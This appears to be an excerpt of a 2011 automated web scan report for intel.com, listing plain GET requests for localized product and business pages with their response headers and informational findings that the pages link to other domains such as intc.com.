gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36851
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ar-AE" lang="ar-AE">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr-EG+invrel
Request
GET /ar_EG/consumer/products/processors/index.htm?iid=gg_ar_EG+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ar-EG" lang="ar-EG">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr-SA+invrel
Request
GET /ar_SA/consumer/products/processors/index.htm?iid=gg_ar_SA+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37052
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ar-SA" lang="ar-SA">
GET /business/enterprise/emea/zaf/index.htm?iid=gg_en_ZA+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37949
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-za"> <head> <title>Intel® Products and Resources for Business</title> ...[SNIP]... <div class="tabBoxGradPad"> <a href="http://www.intelfasterfs.com" onClick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=ENGTBD');" target="_blank">Intel fasterFS</a> ...[SNIP]... <p> <a href="http://www.itweb.co.za/sections/computing/2009/0905180907.asp?S=Business%20Applications&A=BAP&O=google#11" target="_blank">Intel intros business apps</a> ...[SNIP]... <p> <a href="http://mediaproducts.gartner.com/reprints/intel/153886.html" onClick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=ENGTBD');" target="_blank">Gartner validates corporate purchase of Intel.. vPro... technology</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr-UK+invrel">Investor Relations</a> ...[SNIP]...
GET /business/vpro/alliance/index.htm?iid=subhdr+itc_vproalliance HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57048
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel vPro Technology Alliance</title>
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /buy/?iid=gg_prod-en_US+bus_shop HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:14 GMT Content-Length: 26099 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Buy Intel® Products and Services . Intel Corporati ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following links to other domains:
http://www.intc.com/index.cfm?iid=ftr-CN+invrel
http://www.miibeian.gov.cn/?iid=ftr-CN+icpnumber
Request
GET /cn/business/index.htm?iid=gg_zh_CN+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:19 GMT Content-Length: 30860 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta name = "language" content = "zh_CN"/> <meta http-equiv = "co ...[SNIP]... <li><a href="http://www.miibeian.gov.cn/?iid=ftr-CN+icpnumber">... ICP ... 09028403 ...</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr-CN+invrel">...............</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/game/desktop/index.htm?iid=subhdr+game_desktop HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:05 GMT Content-Length: 30300 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/game/gaming-power.htm?iid=subhdr+game_power HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 34495
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/game/index.htm?iid=gg_play+home_game HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 54535
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
